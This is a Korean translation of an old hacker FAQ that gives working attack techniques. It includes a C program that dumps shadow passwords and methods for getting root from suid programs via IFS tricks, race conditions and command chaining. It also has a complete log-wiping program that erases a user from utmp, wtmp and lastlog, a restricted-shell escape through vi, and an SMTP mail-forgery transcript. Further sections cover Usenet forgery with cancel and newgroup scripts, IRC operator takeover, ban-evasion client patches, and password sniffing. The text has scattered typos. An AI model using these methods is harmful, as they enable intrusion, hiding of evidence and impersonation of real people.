패스워드 파일에서 쉽표뒤에 나오는 이상한 문자들은 무엇인가?
suid 스크립트나 프로그램에서 어떻게 root의 권한을 얻을 수 있나?
Usenet에서는 어떻게 위조 메시지를 조작하고 포스팅할 수 있나?
IRC에서 어떻게 ChanOp(channel operator)를 해킹할 수 있나?
어떻게 IRC 클라이언트를 고쳐서 내 진짜 이름을 숨길 수 있나?
이상한 문자가 들어있는 디렉토리에 어떻게 들어갈 수 있나?
이더넷 엿보기(ethernet sniffing)란 무엇인가?
인터넷 아웃다이얼(Internet Outdial)이란?
XXX에서의 처음(default) 패스워드는 무엇인가?
바이러스 같은 것으로부터 나 자신을 어떻게 보호할 것인가?
익명 재전송 메일(anonymous remailer)이란 무엇인가?
관리자 있는 뉴스그룹(moderated newsgroup)에 어떻게
포스팅을 하나?
C/C++ 로 실행코드를 역컴파일할 수 있는 가능성은 없는가?
MS-Windows의 패스워드 암호는 어떻게 동작하나?
유색 기계(colored box)는 모두 무슨 기능이 있나?
국제 직접 번호(International Direct Number)란 무엇인가?
해커에게 관심가는 FAQ(frequentlry asked question)는
무엇인가?
자기띠(magnetic stripe)의 인코더(encoder)와 디코더(decoder)는
어디서 구입하나?
서점에서 2600을 구할 수 없다면 어떻게 해야 하나?
2600을 가판대에서 사는 것보다 주문하는 것이 왜 더
비싼가?
내가 바른 신용카드 번호를 가지고 있는지 어떻게 획인하나?
표준 UNIX에서 패스워드 파일은 /etc/passwd이다. UNIX
중에서 NIS/yp 또는 패스워드 새도우기능을 갖춘 경우에 패스워드
정보는 다른 곳에 있다. 패스워드 파일의 엔트리는 7개의 콜론으로
구분된 필드가 있다.
구분해서 보면, 이 패스워드 파일의 줄은 다음과 같다.
Username(사용자 이름)
암호화된 패스워드 (선택적인 패스워드 수명 데이터)
사용자 번호
그룹 번호
GECOS 정보
홈 디렉토리
쉘
]
] /etc/passwd의 엔트리의 일례:
]
] will:5fg63fhD3d5gh:9406:12:Will Spencer:/home/fsg/will:/bin/bash
]
일반적인 믿음과는 상반되겠지만, UNIX의 패스워드 파일은
해독할 수 없다. UNIX 패스워드는 단반향 함수(one way function)으로
암호화되어 있다. 로그인 프로그램은 "password:"라고 표시되는
프롬프트에서 입력되는 패스워드를 암호화하여 패스워드 파일에 암호화된
패스워드와 비교한다. 패스워드를 깨는 프로그램(password cracking
program)은 단어장(wordlist)를 이용한다. 단어장에 있는 단어 하나씩을
암호화하여 패스워드 파일에 있는 암호와 비교한다. 지금까지 나와
있는 가장 좋은 패스워드 깨는 프로그램은 Alec Muffett이 작성한
Crack이다. DOS용 프로그램으로는 CrackJack이 가장 좋다. CrackJack은
ftp를 이용하여 clark.net의 /ub/jcase/ 디렉토리에서 구할 수 있다.
패스워드 새도우란 보안 시스템으로서 암호화된 /etc/passwd의
패스워드 필드가 특별한 문자로 치환되어 있으며, 실제의 패스워드는
정상적인 사용자가 읽을 수 없는 파일에 저장되어 있다. 대부분(전부는
아니고)의 시스템에서 패스워드 새도우를 깨기 위해서 getpwent()함수를
연속적으로 부르는 프로그램을 작성하여 패스워드 파일을 만들 수
있다.
예:
#include <pwd.h>
main()
{
struct passwd *p;
while(p=getpwent())
printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
}
Unix Path(경로) Token
-----------------------------------------------------------------
AIX 3 /etc/security/passwd !
or /tcb/auth/files/<first letter #
of username>/<username>
A/UX 3.0s /tcb/files/auth/?/*
BSD4.3-Reno /etc/master.passwd *
ConvexOS 10 /etc/shadpw *
ConvexOS 11 /etc/shadow *
DG/UX /etc/tcb/aa/user/ *
EP/IX /etc/shadow x
HP-UX /.secure/etc/passwd *
IRIX 5 /etc/shadow x
Linux 1.1 /etc/shadow *
OSF/1 /etc/passwd[.dir|.pag] *
SCO Unix #.2.x /tcb/auth/files/<first letter *
of username>/<username>
SunOS4.1+c2 /etc/security/passwd.adjunct ##username
SunOS 5.0 /etc/shadow
<optional NIS+ private secure maps/tables/whatever>
System V Release 4.0 /etc/shadow x
System V Release 4.2 /etc/security/* database
Ultrix 4 /etc/auth[.dir|.pag] *
UNICOS /etc/udb *
NIS(Network Information System)은 현재의 이름이고
예전에는 yp(Yellow Page)라고 불리웠다. NIS의 목적은 네트워크에서
여러 기계들이 패스워드와 같은 구성정보를 공유하기 위함이다. NIS는
시스템 보안을 위해서 설계되어 있지 않다. NIS를 이용하고 있다면
/etc/passwd 파일에 다음과 같은 것이 들어 있다.
+::0:0:::
실제 패스워드 파일을 보기 위해서 "ypcat passwd"
명령을 이용하면 된다.
패스워드 파일에서 쉽표뒤에 나오는 이상한 문자들은
무엇인가?
문자는 패스워드 수명(age)을 나타내는 것이다. 패스워드
수명은 관리자가 정한 기일 내에 패스워드 파일을 바꾸도록 한다.
패스워드 수명은 사용자가 패스워드를 바꾸기 전에 정해진 시간만큼은
사용하도록 하기도 한다.
]
] 패스워드 수명 기능이 들어 있는 /etc/passwd 파일의 일례
]
] will:5fg63fhD3d,M.z8:9406:12:Will Spencer:/home/fsg/will:/bin/bash
]
암호화된 패스워드 필드 뒤의 쉼표에 주의하자. 쉼표뒤에
나오는 문자는 모두 패스워드 수령기법을 위해서 사용된다.
]
] 위 예에서의 패스워드 수명 문자
]
] M.z8
]
4 개의 문자가 다음과 같이 번역된다.
1: 패스워드를 변경하지 않고 사용할 수 있는 최대 주(week)의 수
2: 패스워드를 변경하기 전까지 사용해야 할 최소 주(week)의 수
3&4: 1970년 이후로 주의 수로 마지막 패스워드가
바뀐 때
3가지 특별한 경우가 있다.
첫 번째와 두 번째 문자가 '..'로 설정되어 있을 때,
사용자는 다음에 로그인할 때 패스워드를 바꿔야만 한다. 그리고나서
패스워드 프로그램은 패스워드 수명 문자를 없애고, 사용자는 다시
새로운 패스워드 수명에 적용을 받게 된다.
세 번째와 네 번째 문자가 '..'로 설정되어 있을 때,
사용자는 다음에 로그인할 때 패스워드를 바꿔야 한다. 패스워드 프로그램은
첫 번째 두 번째의 경우와 같은 행동을 한다.
만일 첫 번째 문자(MAX)가 두 번째 문자(MIN) 보다 작을
경우, 사용자는 패스워드를 바굴 수 있는 허가가 박탈된다. root만이
이 사용자의 패스워드를 변경할 수 있다.
su 명령은 패스워드 수명 데이터를 검사하지 않는다는데
유의하기 바란다. 말소된 패스워드를 가진 계정으로 su를 행할 수
있다.
패스워드 수명 코드(Password Aging Codes)
+------------------------------------------------------------------------+
| |
| Character: . / 0 1 2 3 4 5 6 7 8 9 A B C D E F G H |
| Number: 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
| |
| Character: I J K L M N O P Q R S T U V W X Y Z a b |
| Number: 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |
| |
| Character: c d e f g h i j k l m n o p q r s t u v |
| Number: 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |
| |
| Character: w x y z |
| Number: 60 61 62 63 |
| |
+------------------------------------------------------------------------+
VMS에서 패스워드 파일은 SYS$SYSTEM:SYSUAF.DAT이다.
그러나, UNIX와는 다르게 대부분의 사용자는 패스워드 파일을 읽을
수 있는 권한이 없다.
SYS$GETUAF 함수를 이용하여 SYSUAF.DAT에 있는 암호화된 패스워드와 결과를 비교하는 프로그램을 작성한다.
두 가지 프로그램이 있는데, CHECK_PASSWORD 와 GUESS_PASSWORD이다.
VMS의 거의 모든 것을 로그로 남길 수 있다. SHOW ACCOUNTING
명령을 이용하여 시스템의 로그 상태를 조사할 수 있다. 시스템 감사가
보안의 목적으로 로그 정보를 남기는 것에 반해, 계끑¤ 이용상태에
대한 정보를 남기는 것이 시스템 어카운팅이다(CPU 이용시간, 트린터
사용 등). 어카운팅을 하기위해서는 다음과 같은 절차를 따른다.
$ SET ACCOUNTING [/ENABLE=(Activity...)]
이렇게 하면, SYS$MANAGER:ACCOUNTING>DAT 파일에 감시 로그정보를 남긴다. 이것은 또한 이전 로그 파일을 닫고 새로운 버전의 로그를 남긴다.
다음과 같은 것이 로그로 남을 수 있다.
BATCH Termination of a batch job
DETACHED Termination of a detached job
IMAGE Image execution
INTERACTIVE Interactive job termination
LOGIN_FAILURE Login failures
MESSAGE Users messages
NETWORK Network job termination
PRINT Print Jobs
PROCESS Any terminated process
SUBPROCESS Termination of a subprocess
보안 감사를 이용하기 위해서는
$ SET AUDIT
/ALARM 은 보안 운영자로 지정된 터미널에 경고를 울리기 위해서 사용하는 옵션이다. 다시 말해서 SECURITY 권한이 필요함을 일깨우는 데 사용된다. 보안 감사 구성을 $ SHOW AUDIT
/ALL명령을 통해서 알수 있다.
보안 감사는 다음과 같은 행위를 로그로 남기도록 할
수 있다.
ACL Access Control List requested events
AUTHORIZATION Modification to the system user
authorization file SYS$SYSTEM:SYSUAF.DAT
BREAKIN Attempted Break-ins
FILE_ACCESS File or global section access
INSTALL Occurrence of any INSTALL operations
LOGFAILURE Any login failures
LOGIN A login attempt from various sources
LOGOUT Logouts
MOUNT Mount or dismount requests
ACNT Allows you to restrain accounting messages
ALLSPOOL Allows you to allocate spooled devices
ALTPRI Allot Priority. This allows you to set any priority
value
BUGCHK Allows you make bug check error log entries
BYPASS Enables you to disregard protections
CMEXEC/
CMKRNL Change to executive or kernel mode. These privileges
allow a process to execute optional routines with KERNEL
and EXECUTIVE access modes. CMKRNL is the most powerful
privilege on VMS as anything protected can be accessed
if you have this privilege. You must have these
privileges to gain access to the kernel data structures
directly.
DETACH This privilege allow you to create detached processes of
arbitrary UICs
DIAGNOSE With this privilege you can diagnose devices
EXQUOTA Allows you to exceed your disk quota
GROUP This privilege grants you permission to affect other
processes in the same rank
GRPNAM Allows you to insert group logical names into the group
logical names table.
GRPPRV Enables you to access system group objects through
system protection field
LOG_IO Allows you to issue logical input output requests
MOUNT May execute the mount function
NETMBX Allows you to create network connections
OPER Allows you to perform operator functions
PFNMAP Allows you to map to specific physical pages
PHY_IO Allows you to perform physical input output requests
PRMCEB Can create permanent common event clusters
PRMGBL Allows you to create permanent global sections
PRMMBX Allows you to create permanent mailboxes
PSWAPM Allows you to change a processes swap mode
READALL Allows you read access to everything
SECURITY Enables you to perform security related functions
SETPRV Enable all privileges
SHARE Allows you to access devices allocated to other users.
This is used to assign system mailboxes.
SHMEM Enables you to modify objects in shared memory
SYSGBL Allows you to create system wide permanent global
sections
SYSLCK Allows you to lock system wide resources
SYSNAM Allows you to insert in system logical names in the
names table.
SYSPRV If a process holds this privilege then it is the same as
a process holding the system user identification code.
TMPMBX Allows you create temporary mailboxes
VOLPRO Enables you to override volume protection
WORLD When this is set you can affect other processes in the
world
프로세스가 어떤 권한으로 수행하고 있는지 알기 위해서
다음과 같은 명령을 사용한다.
$ show /proc/priv
잘못 작성한 제한 쉘에서는 쉘에서 사용하는 기능을 가진 프로그램을 수행함으로서 빠져나올 수 있다. 좋은 예가 vi이다. vi를 수행할 때 다음과 같은 명령을 이용하라.
:set shell=/bikn/sh
그리고 나서 다으모가 같은 명령을 이용하여 쉘을 얻는다.
: shell
제한 쉘에서 "cd" 명령을 사용할 수 없도록
한다면 그 계정으로 ftp를 하면 cd를 할 수 있다.
suid 스크립트나 프로그램에서 어떻게 root의 권한을
얻을 수 있나?
1. 프로그램에서 system()을 이용하여 다른 프로그램을 부른다.면, IFS를 변경하여 그 프로그램을 우롱할 수 있다. IFS는 내부 필드 구분자(Internal Field Separator)의 약자로서 쉘에서 인수를 구분하는 문자로서 사용하는 것이다.
프로그램에 다음과 같은 것이 포함된다고 하자.
system("bin/data")
그리고 IFS를 '/'로 변경하면 쉘은 명령을 다음과 같이
번역한다.
bin date
이제, 프로그램 중에 bin이라는 것이 경로(path)중에
있다면, suid 프로그램은 /bin/date 프로그램 대신 bin이라는 프로그램을
수행하게 된다.
IFS를 바꾸기 위해서, 다음과 같은 명령을 이용한다.
IFS='/'; export IFS
setenv IFS '/'
export IFS='/'
2. 스크립트를 -i로 연결(link)한다.
"-i"라는 프로그램을 만들어 심볼릭 링크(symbolic link)를 만든다. "-i"를 수행하면 쉘(/bin/sh)이
상호작용(interactive) 모드가 되게 한다. 이 방법은
suid(set uid)되어 있는 스크립트에서만 사용가능하다.
예:
% ln suid.sh -i
% -i
#
3. 경쟁 조건을 이용한다.
커널에서 /bin/sh를 로드할 때 다른 프로그램으로 프로그램에
대한 심볼릭 링크를 바꾼다.
예:
nice -19 suidprog; ln -s evilprog suidroot
4. 프로그램에 잘못된 입력을 보낸다.
프로그램과 다른 명령을 한 커맨드 라인에서 수행한다.
예:
suidprog; id
/etc/utmp, /usr/adm/wtmp와 /usr/adm/lastlog 파일을 변경한다. 이것들은 텍스트 파일이 아니라
서 vi로 편집할 수 없다. 특별한 목적을 지닌 프로그램을
작성해야 한다.
예:
#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"
int f;
void kill_utmp(who)
char *who;
{
struct utmp utmp_ent;
if ((f=open(UTMP_NAME,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}
void kill_wtmp(who)
char *who;
{
struct utmp utmp_ent;
long pos;
pos = 1L;
if ((f=open(WTMP_NAME,O_RDWR))>=0) {
while(pos != -1L) {
lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
pos = -1L;
} else {
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof(struct utmp ));
lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
write (f, &utmp_ent, sizeof (utmp_ent));
pos = -1L;
} else pos += 1L;
}
}
close(f);
}
}
void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;
if ((pwd=getpwnam(who))!=NULL) {
if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}
} else printf("%s: ?\n",who);
}
main(argc,argv)
int argc;
char *argv[];
{
if (argc==2) {
kill_lastlog(argv[1]);
kill_wtmp(argv[1]);
kill_utmp(argv[1]);
printf("Zap2!\n");
} else
printf("Error.\n");
}
메일이 온 것으로 보이게 할 호스트의 25 번 포트로
telnet을 한다. 다음 예와 같이 메시지를 쳐 넣는다.
HELO bellcore.com
MAIL FROM:voyager@bellcore.com
RCPT TO:president@whitehouse.gov
DATA
From: voyager@bellcore.com (The Voyager)
To: president@whitehouse.gov
Subject: Clipper
Reply-To: voyager@bellcore.com
Please discontinue your silly Clipper initiative.
.
QUIT
RFC 931에 따라 구현된 시스템에서 "MAIL FROM:"을 속이는 것은 되지 않는다. 자신에게 먼저 위조 메일을 보내서 확인한다.
RFC 822 "Standard for the format of ARPA Internet
text messages"에 더 많은 정보가 있다.
Usenet에서는 어떻게 위조 메시지를 조작하고 포스팅할
수 있나?
From: Anonymous (Pretending to be: tale@uunet.uu.net (David C Lawrence))
Subject: FAQ: 위조를 통한 더 나은 삶 Date: 19 Mar 1995 02:37:09 GMT
"anonymous" 재전송 메일을 이용하지 않는 익명 넷뉴스(netnews).
최근 "NetNews Judges-L"에 영감을 얻어서, 여기서 제어 메시지를 위조하는 것을 포함하도록 하였다. 따라서 독자들은 자신의 투고를 취소하고 자신의 뉴스그룹을 생성하고 삭제할 수 있게 되
었다. 어떤 뉴스 기사들을 저장하라. 여기서는 그것을 "hak"이라고 예를 들어 부르겠다. "hak"을 편집하고 문서형식에서 해더는 제거한다.
From some!random!path!user (note: "From ", not "From: " !!)
Article:
Lines:
Xref:
Path: 의 헤더를 마지막 두 세 개의 까지로 줄인다.
이것은 뉴스 기사가 원래의 곳에서 포시팅 된 것처럼 보이거나, 보낸 곳의 근처의 호스트에서 보낸 것 처럼 만든다. 또는 전혀 새로운 Path: 줄을 만들어서 가짜 에일리어스(alias)를 나타내게 할 수 있다.
다른 곳과 겹치지 않을만한 것으로 Message-ID: 필드를 변경한다. 이것은 @앞에 두 자 정도의 아무 글자나 추가함으로서 할 수 있다. 왜냐하면 뉴스 포스팅 프로그램은 대개 고정길이 필드를 이용하여 이러한 ID를 만들기 때문이다.
쓰고 싶은 아무 것이나를 다른 해더에 넣는다. --From:, Newsgroups:,
Sender: 등. 원래의 메시지를 자신의 메시지로 바꾼다. 관리되고 있는 뉴스그룹에 포스팅을 할 때나 제어 메시지를 포시팅할 때, Approved: 헤더를 넣어서 관리 메카니즘을 피해가는 것을 잊지 말아야 한다.
다른 사람의 기사를 취소할려고 할 때, 그것의 message-ID가 있어야 한다. 이미 있는 메시지 헤더와 자신의 메시지 헤더는 message-ID와 더불어 다음과 같은 것을 포함해야 한다. 이것은 "control message"를 만든다. 주의: 제어 메시지(control messages)는 대개 Approved: 해더가 필요하므로 하나를 추가하도록 한다.
Approved: header as well, so you should add one.
Subject: cmsg cancel <xb8700A@twits.site.com>
Control: cancel <xb8700A@twits.site.com>
Approved: luser@twits.site.com
Newsgroups are created and destroyed with control messages, too. If
you wanted to create, for instance, comp.misc.microsoft.sucks, your
control headers would look like
Subject: cmsg newgroup comp.misc.microsoft.sucks
Control: newgroup comp.misc.microsoft.sucks
그룹이 "moderated with no moderator"(관리자없이 관리됨)을 원할 경우 문자열 "moderated"를
이 끝에 붙인다. 메시지의 본문 중간에 생성하려는 그룹에 대한 설명과 함께 변경된 다음과 같은 텍스트를 포함해야 한다.
For your newsgroups file:
comp.misc.microsoft.sucks We don't do windows
그룹을 없애기 위해서 앞의 헤더 줄에서 "newsgroup"를
"rmgoup"으로 대치한다. 대부분의 사이트에서 "rmgroup"
요청을 관리하는 사람이 그렇게 할 것인지 아닌지를 정하게 하고 있다는
것을 명심하자. 그룹 생성은 아마도 삭제보다는 자동화되어 있을 것이다.
뉴스그룹 변경은 나 자신으로부터의 것일 경우 효과가 있을 가능성이
높ㄷ. 왜냐하면 나의 이름이 많은 NNTP 서버의 제어 스크립트에 들어
있기 때문이다. 따라서 이 포스팅의 헤더로부터 From: 과 Approved:
을 이용하은 것을 권고한다.
변경된 기사를 저장하고 자신의 사이트나 자신을 가리키는
것이 없도록 확실하게 한다. 그리고 자신이 제일 좋아하는 IHAVE 명령을
전달할 수 있는 NNTP 서버에 보낸다. 이 때 다음과 같은 스크립트를
이용한다.
=======================
#! /bin/sh
## Post an article via IHAVE.
## args: filename server
if test "$2" = "" ; then
echo usage: $0 filename server
exit 1
fi
if test ! -f $1 ; then
echo $1: not found
exit 1
fi
# suck msg-id out of headers, keep the brackets
msgid=`sed -e '/^$/,$d' $1 | egrep '^[Mm]essage-[Ii][Dd]: ' | \
sed 's/.*-[Ii][Dd]: //'`
echo $msgid
( sleep 5
echo IHAVE $msgid
sleep 5
cat $1
sleep 1
echo "."
sleep 1
echo QUIT ) | telnet $2 119
=======================
기사가 하루나 이틀 사이에 나타나지 않을 경우, 다른 서버를 시도해본다. 서버는 찾기 쉽다. 여기에 저장된 네트뉴스를 시도해 볼 수 있는 서버의 목록으로 나누어주는 스크립트가 있다. 여기서 나오게 될 결과를 편집하여 사람 이름이 분명한 것과 다른 쓰레기들을 제거하고 사용하면 된다.
=======================
#! /bin/sh
FGV='fgrep -i -v'
egrep '^Path: ' $1 | sed -e 's/^Path: //' -e 's/!/\
/g' | sort -u | fgrep . | $FGV .bitnet | $FGV .uucp
=======================
Once you have your host list, feed it to the following script.
=======================
#! /bin/sh
while read xx ; do
if test "$xx" = "" ; then continue;
fi
echo === $xx
( echo open $xx 119
sleep 5
echo ihave IamSOk00l@podunk.edu
sleep 4
echo .
echo quit
sleep 1
echo quit
) | telnet
done
=======================
위의 스크립트의 이름이 "findem"이고 csh을 이용하고 있다면,
findem < list >& outfile
라고 명령어를 입력하여 모든 telnet의 출력을 저장할 수 있도록 한다. 시간이 오래걸릴 수도 있으나, 끝나면 "outfile"을 편집하고 "335"가 있는 곳을 찾는다. 이것은 서버가 기사를 받을 준비가 되었다는 것을 의미한다. 이것은 완전히 믿을만한 표시는 아니다. 왜냐하면 어떤 서버는 기사를 받겠다고 응답을 하고나서 기사를 버리는 경우도 있기 때문이다. 다른 사람의 메시지를 약간만 변형해서 서버에 보내본 뒤 기사나 나타나는지를 확인한다. 때때로 telnet이 이상한 상태에 빠져 멈추기도 한다. 특히 서버가 NNTP 연결을 거부하는 경우에 특히 그렇다. 만일 멈추어 버린 telnet 프로세스를 kill명령으로 죽이고 스크립트는 수행상태로 놓아둔다면, 스크립트는 계속 수행된다. 다시 말해서 수행중인 finding script를 잠시 감시해야 한다.
IHAVE 를 받아들이지 않으면서 "posting ok"를 보내는 서버를 발결할 수도 있다. 이런 서버들은 POSTS를 통해서 할 수 있을 것이다. 그러나, 이런 서버들은 어디서부터 연결된 것인지를 포함하은 헤더를 가지는 "NNTP-Posting-Host: "를 추가할 것이다. 그러므로 완전히 익명이 될 수 없다.
여기에 나온 정보를 건설적인 목적으로만 사용하기를
바란다.
IRC에서 어떻게 ChanOp(channel operator)를 해킹할
수 있나?
다른 IRC 서버들과 분리된 서버를 찾아낸다. 그리고
채널 OP가 되고 싶은 채널의 이름을 가지고 새로운 채널을 만든다.
서버가 IRC 네트워크에 연결될 때, 실제 채널에서도 OP까 된다. 서버
OP일 경우 고의로 서버를 분리할 수 있다.
어떻게 IRC 클라이언트를 고쳐서 내 진짜 이름을 숨길
수 있나?
주목 : 이 FAQ는 다른 사람이 작성한 것이다. 그러나,
나는 그가 누구인지 모른다. 누가 처음 이것을 작성했는지 아는 사람은
메일을 보내주었으면 좋겠다.
-인용문 시작-
ircII 클라이언트의 원시코드에 다음과 같은 변경을
하고나서 다시 컴파일을 할 경우 새로운 명령 /NEWUSER 명령을 사용할
수 있다. 이 명령은 다음과 같이 사용할 수 있다.
<new_username>은 사용하게 될 새로운 사용자 이름이며 필수이다. [new_IRCNAME]은 새로 사
용하게 될 IRCNAME이며 옵션이다.
이렇게 하면 일단 서버에서 분리하고나서 새로운 정보를
이용하여 다시 접속하게 된다. 현재 있던 모든 채널에 다시 들어가게되고
현재 별명(nickname)을 유지한다.
효과는 수행중에 사용자이름과 IRCname을 바꿀수 있다는
것이다. 서버에서 분리되었다가 다시 접속하더라도 ircII 클라이언트는
빠져나간 것이 아니다. 그러므로 상태정보나 에이리어스(alias)은
그대로 유지된다. 이 방법은 금지(ban)상태에 있는 (ro)bot들을 정말로
귀찮게 하는데 이상적이다.
이것은 ircII에서 새로운 명령이므로 스크립트로 사용할 수 있다. NEWUSER 명령으로 재접속할 때 시간이 걸린다는 데 유의하기 바란다. NEWUSER 다음에 수행되어야 할 명령에 TIMER를 주도록 하라. 예를 들어, ban 회피는 매우 쉽다(그러나 사이트 전체가 금지되었을 때 무한 재접속을 시도하게 됨에 유의하라)
on ^474 * {
echo *** Banned from channel $1
if ($N == [AnnMurray]) {
nick $randomstring
join $1
} {
nick AnnMurray
newuser $randomstring
timer 5 join $1
}
}
또는 귀찮게 하기 위해서 /BE <nickname> 은 username과 IRCNAME을 에일리어스할 수 있다.
^on ^311 * {
^on 311 -*
newuser $2 $5-
}
whois $0
}
이제.. ircII 클라이언트에 새로운 명령을 추가하기 위해서, 최신 클라언트의 소스 코드를 구하고
(아니면 지금 사용하고 있는 클라이언트의 소스코드라도).
"edit.c"가 있는 디렉토리로 들어가서 그 파일을 고친다.
다음과 같은 수정을 한다.
다음 문장이 있는 줄을 찾는다.
extern void server();
다음과 같은 문장을 그 줄 뒤에 넣는다.
static void newuser();
이것은 뒤에 추가할 "newuser()"함수를 미리
정의한다.
이제, 다음과 같은 문장이 있는 줄을 찾는다.
"NAMES", "NAMES", funny_stuff, 0,
그 뒤에 다음과 같은 문장을 넣는다.
"NEWUSER", NULL, newuser, 0,
이리하면 정당한 IRCII 명령에 NEWUSER라는 새로운 명령을
추가하게 된다. 그리고 그 기능을 수행하기 위해서 새로운 함수 newuser()를
부르게 한다.
마지막으로 파일의 맨 끝으로가서 "newuser()"함수를 추가한다.
/*
* newuser: the /NEWUSER command. Added by Hendrix
* Parameters as follows:
* /NEWUSER <new_username> [new_IRCNAME]
* <new_username> is a new username to use and is required
* [new_IRCNAME] is a new IRCNAME string to use and is optional
* This will disconnect you from your server and reconnect using
* the new information given. You will rejoin all channels you
* are currently on and keep your current nickname.
*/
static void newuser(command, args)
char *command,
*args;
{
char *newuname;
if (newuname = next_arg(args, &args))
{
strmcpy(username, newuname, NAME_LEN);
if (*args)
strmcpy(realname, args, REALNAME_LEN);
say("Reconnecting to server...");
close_server(from_server);
if (connect_to_server(server_list[from_server].name,
server_list[from_server].port, primary_server) != -1)
{
change_server_channels(primary_server, from_server);
set_window_server(-1, from_server, 1);
}
else
say("Unable to reconnect. Use /SERVER to connect.");
}
else
say("You must specify a username and, optionally, an IRCNAME");
}
-인용문 끝-
/NEWUSER는 CTCP 쿼리(query)에서 숨겨줄 수 있는 것이
아니다. 그렇게 하기 위해서는 ctcp.c를 다음에서 보여주는 바와 같이
수정해야 한다. 그리고 CTCPFINGER라는 환경변수를 쿼리가 들어올
때 보여주고자 하는 정보로 설정하면 된다.
*** ctcp.old
--- ctcp.c
***************
*** 334 ****
! char c;
--- 334 ---
! char c, *fing;
***************
*** 350,354 ****
! if (pwd = getpwuid(uid))
{
char *tmp;
--- 350,356 ----
! if (fing = getenv("CTCPFINGER"))
! send_ctcp_reply(from, ctcp->name, fing, diff, c);
! else if (pwd = getpwuid(uid))
{
char *tmp;
이상한 문자가 들어있는 디렉토리에 어떻게 들어갈 수
있나?
이러한 디렉토리는 정보를 숨기고자 하는 사람들에 의해서
이용된다. 대부분은 warez(불법 상업용 프로그램)의 사람들이다.
이러한 이상한 문자가 무엇인지 알아내는 몇가지 방법이
있다. 한 가지 방법으로 ls 명령의 인수을 이용하여 ls가 정보를 보여주도록
하는 방법이다.
> ls의 man 페이지에 다음과 같이 설명되어 있다.
-F Causes directories to be marked with a trailing ``/'',
executable files to be marked with a trailing ``*'', and
symbolic links to be marked with a trailing ``@'' symbol.
-q Forces printing of non-graphic characters in filenames as the
character ``?''.
-b Forces printing of non-graphic characters in the \ddd
notation, in octal.
아마도 가장 유용한 도구는 "ls -al filename"을
수행하여 ftp 사이트에 있는 디렉토리 이름을 자신의 기계에 저장하는
것이다. 그리고나서 "cat -t -v -e filename"을 수행하여
어떤 이상한 문자들이 들어 있는지 볼 수 있다.
> cat의 man 페이지에 다음과 같이 설명되어 있다.
-v Causes non-printing characters (with the exception of tabs,
newlines, and form feeds) to be displayed. Control characters
are displayed as ^X (<Ctrl>x), where X is the key pressed with
the <Ctrl> key (for example, <Ctrl>m is displayed as ^M). The
<Del> character (octal 0177) is printed as ^?. Non-ASCII
characters (with the high bit set) are printed as -x, where
x is the character specified by the seven low order bits.
-t Causes tabs to be printed as ^I and form feeds as ^L. This
option is ignored if the -v option is not specified.
-e Causes a ``$'' character to be printed at the end of each line
(prior to the new-line). This option is ignored if the -v
option is not set.
만일 디렉토리 이름에 <SPACE>나 <TAB>이 들어 있다면 따옴표 안에 디렉토리 이름 전체를 넣으면 된다. 예를 들어
cd "..<TAB>"
IBM-PC에서는 이러한 문자를 치기 위해서 <ALT>키를
누르고 숫자판에 있는 숫자를 눌러서 ASCII 번호에 맞게 넣어주면
된다. <ALT>를 떼면 화면에 특수 문자가 표시된다. ASCII표를
이용하면 편리하다.
때때로 사람들은 표준 stty 컨트롤 문자를 가지고 디렉토리
이름을 만든다. ^Z(일시정지), ^C(intr)과 같은. 이러한 문자를 포함하는
디렉토리에 들어가기 위해서는 사용자 stty의 컨트롤 문자를 다른
것으로 설정해야 한다.
> stty의 man 페이지에 다음과 같이 설명되어 있다.
Control assignments
control-character C
Sets control-character to C, where control-character is
erase, kill, intr (interrupt), quit, eof, eol, swtch
(switch), start, stop or susp.
start and stop are available as possible control char-
acters for the control-character C assignment.
If C is preceded by a caret (^) (escaped from the
shell), then the value used is the corresponding con-
trol character (for example, ^D is a <Ctrl>d; ^? is
interpreted as DELETE and ^- is interpreted as unde-
fined).
stty -a 명령을 이용해서 stty의 현재 설정이 어떻게
되어 있는지 알수 있다. 그리고 어떤 것이 문제를 일으키고 있는지
알 수 있다.
이더넷 엿보기(ethernet sniffing)란 무엇인가?
이더넷 훔쳐보기는 (소프트웨어를 이용하여) 흥미를
끄는 패킷을 raw 이더넷 장치를 통해서 하게 된다. ㅌ정 조건에 맞는
패킷을 소프트웨어에서 발견하면, 파일에 저장한다. 유용한 패킷에
대한 일상적인 기준으로는 "login"이나 "password"와
같은 단어를 포함하는 것이다.
많은 이더넷 훔쳐보기 프로그램이 있다. 예를 들면 다음과 같다.
OS Sniffer
~~ ~~~~~~~
4.3/4.4 BSD tcpdump /* Available via anonymous ftp */
FreeBSD tcpdump /* Available via anonymous ftp at */
/* gatekeeper.dec.com
/* /.0/BSD/FreeBSD/FreeBSD-current/src/contrib/tcpdump/ */
NetBSD tcpdump /* Available via anonymous ftp at */
/* gatekeeper.dec.com
/* /.0/BSD/NetBSD/NetBSD-current/src/usr.sbin/ */
DEC Unix tcpdump /* Available via anonymous ftp */
DEC Ultrix tcpdump /* Available via anonymous ftp */
HP/UX nettl (monitor)
& netfmt (display)
